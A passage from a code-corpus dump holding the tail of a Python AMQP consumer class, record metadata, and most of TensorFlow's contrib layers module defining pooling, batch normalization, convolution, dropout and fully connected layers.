An AMQP consumer.
Thread used to consumer messages from the specified queue.
On receipt, each message is used to build an document
and passed to dispatch().
"""
def __init__(self, node, url=None):
"""
:param node: The AMQP node.
:type node: gofer.messaging.adapter.model.Node
:param url: The broker URL.
:type url: str
"""
super(Consumer, self).__init__(node, url)
|
lgpl-2.1
| 7,477,042,401,144,376,000 | 27.918919 | 75 | 0.573598 | false |
HaebinShin/tensorflow
|
tensorflow/contrib/layers/python/layers/layers.py
|
1
|
58331
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=g-short-docstring-punctuation
"""Higher level ops for building layers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
from tensorflow.contrib.framework.python.ops import add_arg_scope
from tensorflow.contrib.framework.python.ops import variables
from tensorflow.contrib.layers.python.layers import initializers
from tensorflow.contrib.layers.python.layers import utils
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import standard_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.training import moving_averages
# TODO(b/28426988): Replace legacy_* fns migrated from slim.
# TODO(b/28426988): Remove legacy_* when all uses have migrated to new API.
__all__ = ['avg_pool2d',
'batch_norm',
'bias_add',
'conv2d',
'conv2d_in_plane',
'conv2d_transpose',
'convolution2d',
'convolution2d_in_plane',
'convolution2d_transpose',
'dropout',
'flatten',
'fully_connected',
'linear',
'max_pool2d',
'one_hot_encoding',
'relu',
'relu6',
'repeat',
'separable_conv2d',
'separable_convolution2d',
'softmax',
'stack',
'unit_norm',
'legacy_fully_connected',
'legacy_linear',
'legacy_relu']
@add_arg_scope
def avg_pool2d(inputs,
kernel_size,
stride=2,
padding='VALID',
outputs_collections=None,
scope=None):
"""Adds a Avg Pooling op.
It is assumed by the wrapper that the pooling is only done per image and not
in depth or batch.
Args:
inputs: a tensor of size [batch_size, height, width, depth].
kernel_size: a list of length 2: [kernel_height, kernel_width] of the
pooling kernel over which the op is computed. Can be an int if both
values are the same.
stride: a list of length 2: [stride_height, stride_width].
Can be an int if both strides are the same. Note that presently
both strides must have the same value.
padding: the padding method, either 'VALID' or 'SAME'.
outputs_collections: collection to add the outputs.
scope: Optional scope for op_scope.
Returns:
a tensor representing the results of the pooling operation.
"""
with ops.op_scope([inputs], scope, 'AvgPool2D') as sc:
inputs = ops.convert_to_tensor(inputs)
kernel_h, kernel_w = utils.two_element_tuple(kernel_size)
stride_h, stride_w = utils.two_element_tuple(stride)
outputs = nn.avg_pool(inputs,
ksize=[1, kernel_h, kernel_w, 1],
strides=[1, stride_h, stride_w, 1],
padding=padding)
return utils.collect_named_outputs(outputs_collections, sc, outputs)
@add_arg_scope
def batch_norm(inputs,
decay=0.999,
center=True,
scale=False,
epsilon=0.001,
activation_fn=None,
updates_collections=ops.GraphKeys.UPDATE_OPS,
is_training=True,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
scope=None):
"""Adds a Batch Normalization layer from http://arxiv.org/abs/1502.03167.
"Batch Normalization: Accelerating Deep Network Training by Reducing
Internal Covariate Shift"
Sergey Ioffe, Christian Szegedy
Can be used as a normalizer function for conv2d and fully_connected.
Args:
inputs: a tensor of size `[batch_size, height, width, channels]`
or `[batch_size, channels]`.
decay: decay for the moving average.
center: If True, subtract `beta`. If False, `beta` is ignored.
scale: If True, multiply by `gamma`. If False, `gamma` is
not used. When the next layer is linear (also e.g. `nn.relu`), this can be
disabled since the scaling can be done by the next layer.
epsilon: small float added to variance to avoid dividing by zero.
activation_fn: Optional activation function.
updates_collections: collections to collect the update ops for computation.
If None, a control dependency would be added to make sure the updates are
computed.
is_training: whether or not the layer is in training mode. In training mode
it would accumulate the statistics of the moments into `moving_mean` and
`moving_variance` using an exponential moving average with the given
`decay`. When it is not in training mode then it would use the values of
the `moving_mean` and the `moving_variance`.
reuse: whether or not the layer and its variables should be reused. To be
able to reuse the layer scope must be given.
variables_collections: optional collections for the variables.
outputs_collections: collections to add the outputs.
trainable: If `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
scope: Optional scope for `variable_op_scope`.
Returns:
A `Tensor` representing the output of the operation.
Raises:
ValueError: if rank or last dimension of `inputs` is undefined.
"""
with variable_scope.variable_op_scope([inputs],
scope, 'BatchNorm', reuse=reuse) as sc:
inputs = ops.convert_to_tensor(inputs)
inputs_shape = inputs.get_shape()
inputs_rank = inputs_shape.ndims
if inputs_rank is None:
raise ValueError('Inputs %s has undefined rank.' % inputs.name)
dtype = inputs.dtype.base_dtype
axis = list(range(inputs_rank - 1))
params_shape = inputs_shape[-1:]
if not params_shape.is_fully_defined():
raise ValueError('Inputs %s has undefined last dimension %s.' % (
inputs.name, params_shape))
# Allocate parameters for the beta and gamma of the normalization.
beta, gamma = None, None
if center:
beta_collections = utils.get_variable_collections(variables_collections,
'beta')
beta = variables.model_variable('beta',
shape=params_shape,
dtype=dtype,
initializer=init_ops.zeros_initializer,
collections=beta_collections,
trainable=trainable)
if scale:
gamma_collections = utils.get_variable_collections(variables_collections,
'gamma')
gamma = variables.model_variable('gamma',
shape=params_shape,
dtype=dtype,
initializer=init_ops.ones_initializer,
collections=gamma_collections,
trainable=trainable)
# Create moving_mean and moving_variance variables and add them to the
# appropiate collections.
moving_mean_collections = utils.get_variable_collections(
variables_collections, 'moving_mean')
moving_mean = variables.model_variable(
'moving_mean',
shape=params_shape,
dtype=dtype,
initializer=init_ops.zeros_initializer,
trainable=False,
collections=moving_mean_collections)
moving_variance_collections = utils.get_variable_collections(
variables_collections, 'moving_variance')
moving_variance = variables.model_variable(
'moving_variance',
shape=params_shape,
dtype=dtype,
initializer=init_ops.ones_initializer,
trainable=False,
collections=moving_variance_collections)
is_training_value = utils.constant_value(is_training)
# Calculate the moments based on the individual batch.
need_moments = is_training_value is None or is_training_value
if need_moments:
mean, variance = nn.moments(inputs, axis, shift=moving_mean)
moving_vars_fn = lambda: (moving_mean, moving_variance)
if updates_collections is None:
def _force_updates():
"""Internal function forces updates moving_vars if is_training."""
update_moving_mean = moving_averages.assign_moving_average(
moving_mean, mean, decay)
update_moving_variance = moving_averages.assign_moving_average(
moving_variance, variance, decay)
with ops.control_dependencies([update_moving_mean,
update_moving_variance]):
return array_ops.identity(mean), array_ops.identity(variance)
mean, variance = utils.smart_cond(is_training,
_force_updates,
moving_vars_fn)
else:
def _delay_updates():
"""Internal function that delay updates moving_vars if is_training."""
update_moving_mean = moving_averages.assign_moving_average(
moving_mean, mean, decay)
update_moving_variance = moving_averages.assign_moving_average(
moving_variance, variance, decay)
return update_moving_mean, update_moving_variance
update_mean, update_variance = utils.smart_cond(is_training,
_delay_updates,
moving_vars_fn)
ops.add_to_collections(updates_collections, update_mean)
ops.add_to_collections(updates_collections, update_variance)
# Use computed moments during training and moving_vars otherwise.
vars_fn = lambda: (mean, variance)
mean, variance = utils.smart_cond(is_training, vars_fn, moving_vars_fn)
else:
mean, variance = moving_mean, moving_variance
# Compute batch_normalization.
outputs = nn.batch_normalization(
inputs, mean, variance, beta, gamma, epsilon)
outputs.set_shape(inputs_shape)
if activation_fn:
outputs = activation_fn(outputs)
return utils.collect_named_outputs(outputs_collections, sc.name, outputs)
@add_arg_scope
def bias_add(inputs,
activation_fn=None,
initializer=init_ops.zeros_initializer,
regularizer=None,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
scope=None):
"""Adds a bias to the inputs.
Can be used as a normalizer function for conv2d and fully_connected.
Args:
inputs: a tensor of with at least rank 2 and value for the last dimension,
e.g. `[batch_size, depth]`, `[None, None, None, depth]`.
activation_fn: Optional activation function.
initializer: An initializer for the bias, defaults to 0.
regularizer: A regularizer like the result of
`l1_regularizer` or `l2_regularizer`.
reuse: whether or not the layer and its variables should be reused. To be
able to reuse the layer scope must be given.
variables_collections: optional collections for the variables.
outputs_collections: collections to add the outputs.
trainable: If `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
scope: Optional scope for variable_op_scope.
Returns:
a tensor representing the result of adding biases to the inputs.
"""
with variable_scope.variable_op_scope([inputs],
scope, 'BiasAdd', reuse=reuse) as sc:
inputs = ops.convert_to_tensor(inputs)
dtype = inputs.dtype.base_dtype
num_features = utils.last_dimension(inputs.get_shape(), min_rank=2)
biases_collections = utils.get_variable_collections(variables_collections,
'biases')
biases = variables.model_variable('biases',
shape=[num_features,],
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
collections=biases_collections,
trainable=trainable)
outputs = nn.bias_add(inputs, biases)
if activation_fn:
outputs = activation_fn(outputs)
return utils.collect_named_outputs(outputs_collections, sc.name, outputs)
@add_arg_scope
def convolution2d(inputs,
num_outputs,
kernel_size,
stride=1,
padding='SAME',
rate=1,
activation_fn=nn.relu,
normalizer_fn=None,
normalizer_params=None,
weights_initializer=initializers.xavier_initializer(),
weights_regularizer=None,
biases_initializer=init_ops.zeros_initializer,
biases_regularizer=None,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
scope=None):
"""Adds a 2D convolution followed by an optional batch_norm layer.
`convolution2d` creates a variable called `weights`, representing the
convolutional kernel, that is convolved with the `inputs` to produce a
`Tensor` of activations. If a `normalizer_fn` is provided (such as
`batch_norm`), it is then applied. Otherwise, if `normalizer_fn` is
None and a `biases_initializer` is provided then a `biases` variable would be
created and added the activations. Finally, if `activation_fn` is not `None`,
it is applied to the activations as well.
Performs a'trous convolution with input stride equal to rate if rate is
greater than one.
Args:
inputs: a 4-D tensor `[batch_size, height, width, channels]`.
num_outputs: integer, the number of output filters.
kernel_size: a list of length 2 `[kernel_height, kernel_width]` of
of the filters. Can be an int if both values are the same.
stride: a list of length 2 `[stride_height, stride_width]`.
Can be an int if both strides are the same. Note that presently
both strides must have the same value.
padding: one of `VALID` or `SAME`.
rate: integer. If less than or equal to 1, a standard convolution is used.
If greater than 1, than the a'trous convolution is applied and `stride`
must be set to 1.
activation_fn: activation function.
normalizer_fn: normalization function to use instead of `biases`. If
`normalize_fn` is provided then `biases_initializer` and
`biases_regularizer` are ignored and `biases` are not created nor added.
normalizer_params: normalization function parameters.
weights_initializer: An initializer for the weights.
weights_regularizer: Optional regularizer for the weights.
biases_initializer: An initializer for the biases. If None skip biases.
biases_regularizer: Optional regularizer for the biases.
reuse: whether or not the layer and its variables should be reused. To be
able to reuse the layer scope must be given.
variables_collections: optional list of collections for all the variables or
a dictionay containing a different list of collection per variable.
outputs_collections: collection to add the outputs.
trainable: If `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
scope: Optional scope for `variable_op_scope`.
Returns:
a tensor representing the output of the operation.
Raises:
ValueError: if both 'rate' and `stride` are larger than one.
"""
with variable_scope.variable_op_scope([inputs],
scope, 'Conv', reuse=reuse) as sc:
inputs = ops.convert_to_tensor(inputs)
dtype = inputs.dtype.base_dtype
kernel_h, kernel_w = utils.two_element_tuple(kernel_size)
stride_h, stride_w = utils.two_element_tuple(stride)
if rate > 1 and (stride_h > 1 or stride_w > 1):
raise ValueError('Only one of rate or stride can be larger than one')
num_filters_in = utils.last_dimension(inputs.get_shape(), min_rank=4)
weights_shape = [kernel_h, kernel_w,
num_filters_in, num_outputs]
weights_collections = utils.get_variable_collections(
variables_collections, 'weights')
weights = variables.model_variable('weights',
shape=weights_shape,
dtype=dtype,
initializer=weights_initializer,
regularizer=weights_regularizer,
collections=weights_collections,
trainable=trainable)
if rate > 1:
outputs = nn.atrous_conv2d(inputs, weights, rate, padding=padding)
else:
outputs = nn.conv2d(inputs, weights, [1, stride_h, stride_w, 1],
padding=padding)
if normalizer_fn:
normalizer_params = normalizer_params or {}
outputs = normalizer_fn(outputs, **normalizer_params)
else:
if biases_initializer is not None:
biases_collections = utils.get_variable_collections(
variables_collections, 'biases')
biases = variables.model_variable('biases',
shape=[num_outputs,],
dtype=dtype,
initializer=biases_initializer,
regularizer=biases_regularizer,
collections=biases_collections,
trainable=trainable)
outputs = nn.bias_add(outputs, biases)
if activation_fn:
outputs = activation_fn(outputs)
return utils.collect_named_outputs(outputs_collections, sc.name, outputs)
@add_arg_scope
def convolution2d_in_plane(
inputs,
kernel_size,
stride=1,
padding='SAME',
activation_fn=nn.relu,
normalizer_fn=None,
normalizer_params=None,
weights_initializer=initializers.xavier_initializer(),
weights_regularizer=None,
biases_initializer=init_ops.zeros_initializer,
biases_regularizer=None,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
scope=None):
"""Performs the same in-plane convolution to each channel independently.
This is useful for performing various simple channel-independent convolution
operations such as image gradients:
image = tf.constant(..., shape=(16, 240, 320, 3))
vert_gradients = layers.conv2d_in_plane(image,
kernel=[1, -1],
kernel_size=[2, 1])
horz_gradients = layers.conv2d_in_plane(image,
kernel=[1, -1],
kernel_size=[1, 2])
Args:
inputs: a 4-D tensor with dimensions [batch_size, height, width, channels].
kernel_size: a list of length 2 holding the [kernel_height, kernel_width] of
of the pooling. Can be an int if both values are the same.
stride: a list of length 2 `[stride_height, stride_width]`.
Can be an int if both strides are the same. Note that presently
both strides must have the same value.
padding: the padding type to use, either 'SAME' or 'VALID'.
activation_fn: activation function.
normalizer_fn: normalization function to use instead of `biases`. If
`normalize_fn` is provided then `biases_initializer` and
`biases_regularizer` are ignored and `biases` are not created nor added.
normalizer_params: normalization function parameters.
weights_initializer: An initializer for the weights.
weights_regularizer: Optional regularizer for the weights.
biases_initializer: An initializer for the biases. If None skip biases.
biases_regularizer: Optional regularizer for the biases.
reuse: whether or not the layer and its variables should be reused. To be
able to reuse the layer scope must be given.
variables_collections: optional list of collections for all the variables or
a dictionay containing a different list of collection per variable.
outputs_collections: collection to add the outputs.
trainable: If `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
scope: Optional scope for `variable_op_scope`.
Returns:
A `Tensor` representing the output of the operation.
"""
with variable_scope.variable_op_scope(
[inputs], scope, 'ConvInPlane', reuse=reuse) as sc:
dtype = inputs.dtype.base_dtype
kernel_h, kernel_w = utils.two_element_tuple(kernel_size)
stride_h, stride_w = utils.two_element_tuple(stride)
num_filters_in = utils.last_dimension(inputs.get_shape(), min_rank=4)
weights_shape = [kernel_h, kernel_w, 1, 1]
weights_collections = utils.get_variable_collections(
variables_collections, 'weights')
weights = variables.model_variable('weights',
shape=weights_shape,
dtype=dtype,
initializer=weights_initializer,
regularizer=weights_regularizer,
collections=weights_collections,
trainable=trainable)
depthwise_weights = array_ops.tile(weights, [1, 1, num_filters_in, 1])
outputs = nn.depthwise_conv2d(inputs, depthwise_weights,
[1, stride_h, stride_w, 1], padding)
if normalizer_fn:
normalizer_params = normalizer_params or {}
outputs = normalizer_fn(outputs, **normalizer_params)
else:
if biases_initializer is not None:
biases_collections = utils.get_variable_collections(
variables_collections, 'biases')
biases = variables.model_variable('biases',
shape=[num_filters_in,],
dtype=dtype,
initializer=biases_initializer,
regularizer=biases_regularizer,
collections=biases_collections,
trainable=trainable)
outputs = nn.bias_add(outputs, biases)
if activation_fn:
outputs = activation_fn(outputs)
return utils.collect_named_outputs(outputs_collections, sc.name, outputs)
@add_arg_scope
def convolution2d_transpose(
inputs,
num_outputs,
kernel_size,
stride=1,
padding='SAME',
activation_fn=nn.relu,
normalizer_fn=None,
normalizer_params=None,
weights_initializer=initializers.xavier_initializer(),
weights_regularizer=None,
biases_initializer=init_ops.zeros_initializer,
biases_regularizer=None,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
scope=None):
"""Adds a convolution2d_transpose with an optional batch normalization layer.
The function creates a variable called `weights`, representing the
kernel, that is convolved with the input. If `batch_norm_params` is `None`, a
second variable called 'biases' is added to the result of the operation.
Args:
inputs: a tensor of size [batch_size, height, width, channels].
num_outputs: integer, the number of output filters.
kernel_size: a list of length 2 holding the [kernel_height, kernel_width] of
of the filters. Can be an int if both values are the same.
stride: a list of length 2: [stride_height, stride_width].
Can be an int if both strides are the same. Note that presently
both strides must have the same value.
padding: one of 'VALID' or 'SAME'.
activation_fn: activation function.
normalizer_fn: normalization function to use instead of `biases`. If
`normalize_fn` is provided then `biases_initializer` and
`biases_regularizer` are ignored and `biases` are not created nor added.
normalizer_params: normalization function parameters.
weights_initializer: An initializer for the weights.
weights_regularizer: Optional regularizer for the weights.
biases_initializer: An initializer for the biases. If None skip biases.
biases_regularizer: Optional regularizer for the biases.
reuse: whether or not the layer and its variables should be reused. To be
able to reuse the layer scope must be given.
variables_collections: optional list of collections for all the variables or
a dictionay containing a different list of collection per variable.
outputs_collections: collection to add the outputs.
trainable: whether or not the variables should be trainable or not.
scope: Optional scope for variable_op_scope.
Returns:
a tensor representing the output of the operation.
Raises:
ValueError: if 'kernel_size' is not a list of length 2.
"""
with variable_scope.variable_op_scope(
[inputs], scope, 'Conv2d_transpose', reuse=reuse) as sc:
dtype = inputs.dtype.base_dtype
kernel_h, kernel_w = utils.two_element_tuple(kernel_size)
stride_h, stride_w = utils.two_element_tuple(stride)
num_filters_in = utils.last_dimension(
inputs.get_shape(), min_rank=4)
weights_shape = [kernel_h, kernel_w, num_outputs, num_filters_in]
weights_collections = utils.get_variable_collections(
variables_collections, 'weights')
weights = variables.model_variable(
'weights',
shape=weights_shape,
dtype=dtype,
initializer=weights_initializer,
regularizer=weights_regularizer,
trainable=trainable,
collections=weights_collections)
inputs_shape = array_ops.shape(inputs)
batch_size = inputs_shape[0]
height, width = inputs_shape[1], inputs_shape[2]
def get_deconv_dim(dim_size, stride_size, kernel_size, padding):
if isinstance(dim_size, ops.Tensor):
dim_size = math_ops.mul(dim_size, stride_size)
elif dim_size is not None:
dim_size *= stride_size
if padding == 'VALID' and dim_size is not None:
dim_size += max(kernel_size - stride_size, 0)
return dim_size
# Infer the dynamic output shape:
out_height = get_deconv_dim(height, stride_h, kernel_h, padding)
out_width = get_deconv_dim(width, stride_w, kernel_w, padding)
output_shape = array_ops.pack(
[batch_size, out_height, out_width, num_outputs])
outputs = nn.conv2d_transpose(inputs, weights, output_shape,
[1, stride_h, stride_w, 1],
padding=padding)
# Infer the static output shape:
out_shape = inputs.get_shape().as_list()
out_shape[-1] = num_outputs
out_shape[1] = get_deconv_dim(out_shape[1], stride_h, kernel_h, padding)
out_shape[2] = get_deconv_dim(out_shape[2], stride_w, kernel_w, padding)
outputs.set_shape(out_shape)
if normalizer_fn:
normalizer_params = normalizer_params or {}
outputs = normalizer_fn(outputs, **normalizer_params)
else:
if biases_initializer is not None:
biases_collections = utils.get_variable_collections(
variables_collections, 'biases')
biases = variables.model_variable('biases',
shape=[num_outputs,],
dtype=dtype,
initializer=biases_initializer,
regularizer=biases_regularizer,
collections=biases_collections)
outputs = nn.bias_add(outputs, biases)
if activation_fn:
outputs = activation_fn(outputs)
return utils.collect_named_outputs(outputs_collections, sc.name, outputs)
@add_arg_scope
def dropout(inputs,
keep_prob=0.5,
noise_shape=None,
is_training=True,
outputs_collections=None,
scope=None):
"""Returns a dropout op applied to the input.
With probability `keep_prob`, outputs the input element scaled up by
`1 / keep_prob`, otherwise outputs `0`. The scaling is so that the expected
sum is unchanged.
Args:
inputs: the tensor to pass to the nn.dropout op.
keep_prob: A scalar `Tensor` with the same type as x. The probability
that each element is kept.
noise_shape: A 1-D `Tensor` of type `int32`, representing the
shape for randomly generated keep/drop flags.
is_training: A bool `Tensor` indicating whether or not the model
is in training mode. If so, dropout is applied and values scaled.
Otherwise, inputs is returned.
outputs_collections: collection to add the outputs.
scope: Optional scope for op_scope.
Returns:
a tensor representing the output of the operation.
"""
with ops.op_scope([inputs], scope, 'Dropout') as sc:
inputs = ops.convert_to_tensor(inputs)
dropout_fn = lambda: nn.dropout(inputs, keep_prob, noise_shape)
id_fn = lambda: inputs
outputs = utils.smart_cond(is_training, dropout_fn, id_fn)
return utils.collect_named_outputs(outputs_collections, sc, outputs)
@add_arg_scope
def flatten(inputs,
outputs_collections=None,
scope=None):
"""Flattens the input while maintaining the batch_size.
Assumes that the first dimension represents the batch.
Args:
inputs: a tensor of size [batch_size, ...].
outputs_collections: collection to add the outputs.
scope: Optional scope for op_scope.
Returns:
a flattened tensor with shape [batch_size, k].
Raises:
ValueError: if inputs.shape is wrong.
"""
with ops.op_scope([inputs], scope, 'Flatten') as sc:
inputs = ops.convert_to_tensor(inputs)
inputs_shape = inputs.get_shape()
inputs_rank = inputs_shape.ndims
if (inputs_rank is None) or (inputs_rank < 2):
raise ValueError('Inputs must have a least 2 dimensions.')
dims = inputs_shape[1:]
if not dims.is_fully_defined():
raise ValueError('Inputs 2nd dimension must be defined.')
k = dims.num_elements()
outputs = array_ops.reshape(inputs, [-1, k])
return utils.collect_named_outputs(outputs_collections, sc, outputs)
@add_arg_scope
def fully_connected(inputs,
num_outputs,
activation_fn=nn.relu,
normalizer_fn=None,
normalizer_params=None,
weights_initializer=initializers.xavier_initializer(),
weights_regularizer=None,
biases_initializer=init_ops.zeros_initializer,
biases_regularizer=None,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
scope=None):
"""Adds a fully connected layer.
`fully_connected` creates a variable called `weights`, representing a fully
connected weight matrix, which is multiplied by the `inputs` to produce a
`Tensor` of hidden units. If a `normalizer_fn` is provided (such as
`batch_norm`), it is then applied. Otherwise, if `normalizer_fn` is
None and a `biases_initializer` is provided then a `biases` variable would be
created and added the hidden units. Finally, if `activation_fn` is not `None`,
it is applied to the hidden units as well.
Note: that if `inputs` have a rank greater than 2, then `inputs` is flattened
prior to the initial matrix multiply by `weights`.
Args:
inputs: A tensor of with at least rank 2 and value for the last dimension,
i.e. `[batch_size, depth]`, `[None, None, None, channels]`.
num_outputs: Integer, the number of output units in the layer.
activation_fn: activation function.
normalizer_fn: normalization function to use instead of `biases`. If
`normalize_fn` is provided then `biases_initializer` and
`biases_regularizer` are ignored and `biases` are not created nor added.
normalizer_params: normalization function parameters.
weights_initializer: An initializer for the weights.
weights_regularizer: Optional regularizer for the weights.
biases_initializer: An initializer for the biases. If None skip biases.
biases_regularizer: Optional regularizer for the biases.
reuse: whether or not the layer and its variables should be reused. To be
able to reuse the layer scope must be given.
variables_collections: Optional list of collections for all the variables or
a dictionary containing a different list of collections per variable.
outputs_collections: collection to add the outputs.
trainable: If `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
scope: Optional scope for variable_op_scope.
Returns:
the tensor variable representing the result of the series of operations.
Raises:
ValueError: if x has rank less than 2 or if its last dimension is not set.
"""
if not isinstance(num_outputs, int):
raise ValueError('num_outputs should be integer, got %s.', num_outputs)
with variable_scope.variable_op_scope([inputs],
scope,
'fully_connected',
reuse=reuse) as sc:
inputs = ops.convert_to_tensor(inputs)
dtype = inputs.dtype.base_dtype
inputs_shape = inputs.get_shape()
num_input_units = utils.last_dimension(inputs_shape, min_rank=2)
static_shape = inputs_shape.as_list()
static_shape[-1] = num_outputs
out_shape = array_ops.unpack(array_ops.shape(inputs))
out_shape[-1] = num_outputs
weights_shape = [num_input_units, num_outputs]
weights_collections = utils.get_variable_collections(
variables_collections, 'weights')
weights = variables.model_variable('weights',
shape=weights_shape,
dtype=dtype,
initializer=weights_initializer,
regularizer=weights_regularizer,
collections=weights_collections,
trainable=trainable)
if len(static_shape) > 2:
# Reshape inputs
inputs = array_ops.reshape(inputs, [-1, num_input_units])
outputs = standard_ops.matmul(inputs, weights)
if normalizer_fn:
normalizer_params = normalizer_params or {}
outputs = normalizer_fn(outputs, **normalizer_params)
else:
if biases_initializer is not None:
biases_collections = utils.get_variable_collections(
variables_collections, 'biases')
biases = variables.model_variable('biases',
shape=[num_outputs,],
dtype=dtype,
initializer=biases_initializer,
regularizer=biases_regularizer,
collections=biases_collections,
trainable=trainable)
outputs = nn.bias_add(outputs, biases)
if activation_fn:
outputs = activation_fn(outputs)
if len(static_shape) > 2:
# Reshape back outputs
outputs = array_ops.reshape(outputs, array_ops.pack(out_shape))
outputs.set_shape(static_shape)
return utils.collect_named_outputs(outputs_collections, sc.name, outputs)
@add_arg_scope
def max_pool2d(inputs,
kernel_size,
stride=2,
padding='VALID',
outputs_collections=None,
scope=None):
"""Adds a Max Pooling op.
It is assumed by the wrapper that the pooling is only done per image and not
in depth or batch.
Args:
inputs: a tensor of size [batch_size, height, width, depth].
kernel_size: a list of length 2: [kernel_height, kernel_width] of the
pooling kernel over which the op is computed. Can be an int if both
values are the same.
stride: a list of length 2: [stride_height, stride_width].
Can be an int if both strides are the same. Note that presently
both strides must have the same value.
padding: the padding method, either 'VALID' or 'SAME'.
outputs_collections: collection to add the outputs.
scope: Optional scope for op_scope.
Returns:
a tensor representing the results of the pooling operation.
Raises:
ValueError: if 'kernel_size' is not a 2-D list
"""
with ops.op_scope([inputs], scope, 'MaxPool2D') as sc:
inputs = ops.convert_to_tensor(inputs)
kernel_h, kernel_w = utils.two_element_tuple(kernel_size)
stride_h, stride_w = utils.two_element_tuple(stride)
outputs = nn.max_pool(inputs,
ksize=[1, kernel_h, kernel_w, 1],
strides=[1, stride_h, stride_w, 1],
padding=padding)
return utils.collect_named_outputs(outputs_collections, sc, outputs)
@add_arg_scope
def one_hot_encoding(labels,
num_classes,
on_value=1.0,
off_value=0.0,
outputs_collections=None,
scope=None):
"""Transform numeric labels into onehot_labels using tf.one_hot.
Args:
labels: [batch_size] target labels.
num_classes: total number of classes.
on_value: A scalar defining the on-value.
off_value: A scalar defining the off-value.
outputs_collections: collection to add the outputs.
scope: Optional scope for op_scope.
Returns:
one hot encoding of the labels.
"""
with ops.op_scope([labels, num_classes], scope, 'OneHotEncoding') as sc:
labels = ops.convert_to_tensor(labels)
if labels.dtype == dtypes.int32:
labels = standard_ops.to_int64(labels)
outputs = standard_ops.one_hot(labels,
num_classes,
on_value=on_value,
off_value=off_value)
return utils.collect_named_outputs(outputs_collections, sc, outputs)
def _apply_activation(y, activation_fn, output_collections):
if activation_fn:
y = activation_fn(y)
ops.add_to_collections(list(output_collections or []) +
[ops.GraphKeys.ACTIVATIONS], y)
return y
def repeat(inputs, repetitions, layer, *args, **kwargs):
"""Applies the same layer with the same arguments repeatedly.
```python
y = repeat(x, 3, conv2d, 64, [3, 3], scope='conv1')
# It is equivalent to:
x = conv2d(x, 64, [3, 3], scope='conv1/conv1_1')
x = conv2d(x, 64, [3, 3], scope='conv1/conv1_2')
y = conv2d(x, 64, [3, 3], scope='conv1/conv1_3')
```
If the `scope` argument is not given in `kwargs`, it is set to
`layer.__name__`, or `layer.func.__name__` (for `functools.partial`
objects). If neither `__name__` nor `func.__name__` is available, the
layers are called with `scope='stack'`.
Args:
inputs: A `Tensor` suitable for layer.
repetitions: Int, number of repetitions.
layer: A layer with arguments `(inputs, *args, **kwargs)`
*args: Extra args for the layer.
**kwargs: Extra kwargs for the layer.
Returns:
a tensor result of applying the layer, repetitions times.
Raises:
ValueError: if the op is unknown or wrong.
"""
scope = kwargs.pop('scope', None)
with variable_scope.variable_op_scope([inputs], scope, 'Repeat'):
inputs = ops.convert_to_tensor(inputs)
if scope is None:
if hasattr(layer, '__name__'):
scope = layer.__name__
elif hasattr(layer, 'func') and hasattr(layer.func, '__name__'):
scope = layer.func.__name__ # In case layer is a functools.partial.
else:
scope = 'repeat'
outputs = inputs
for i in range(repetitions):
kwargs['scope'] = scope + '_' + str(i+1)
outputs = layer(outputs, *args, **kwargs)
return outputs
@add_arg_scope
def separable_convolution2d(
inputs,
num_outputs,
kernel_size,
depth_multiplier,
stride=1,
padding='SAME',
activation_fn=nn.relu,
normalizer_fn=None,
normalizer_params=None,
weights_initializer=initializers.xavier_initializer(),
weights_regularizer=None,
biases_initializer=init_ops.zeros_initializer,
biases_regularizer=None,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
scope=None):
"""Adds a depth-separable 2D convolution with optional batch_norm layer.
This op first performs a depthwise convolution that acts separately on
channels, creating a variable called `depthwise_weights`. If `num_outputs`
is not None, it adds a pointwise convolution that mixes channels, creating a
variable called `pointwise_weights`. Then, if `batch_norm_params` is None,
it adds bias to the result, creating a variable called 'biases', otherwise
it adds a batch normalization layer. It finally applies an activation function
to produce the end result.
Args:
inputs: a tensor of size [batch_size, height, width, channels].
num_outputs: the number of pointwise convolution output filters. If is
None, then we skip the pointwise convolution stage.
kernel_size: a list of length 2: [kernel_height, kernel_width] of
of the filters. Can be an int if both values are the same.
depth_multiplier: the number of depthwise convolution output channels for
each input channel. The total number of depthwise convolution output
channels will be equal to `num_filters_in * depth_multiplier`.
stride: a list of length 2: [stride_height, stride_width], specifying the
depthwise convolution stride. Can be an int if both strides are the same.
padding: one of 'VALID' or 'SAME'.
activation_fn: activation function.
normalizer_fn: normalization function to use instead of `biases`. If
`normalize_fn` is provided then `biases_initializer` and
`biases_regularizer` are ignored and `biases` are not created nor added.
normalizer_params: normalization function parameters.
weights_initializer: An initializer for the weights.
weights_regularizer: Optional regularizer for the weights.
biases_initializer: An initializer for the biases. If None skip biases.
biases_regularizer: Optional regularizer for the biases.
reuse: whether or not the layer and its variables should be reused. To be
able to reuse the layer scope must be given.
variables_collections: optional list of collections for all the variables or
a dictionay containing a different list of collection per variable.
outputs_collections: collection to add the outputs.
trainable: whether or not the variables should be trainable or not.
scope: Optional scope for variable_op_scope.
Returns:
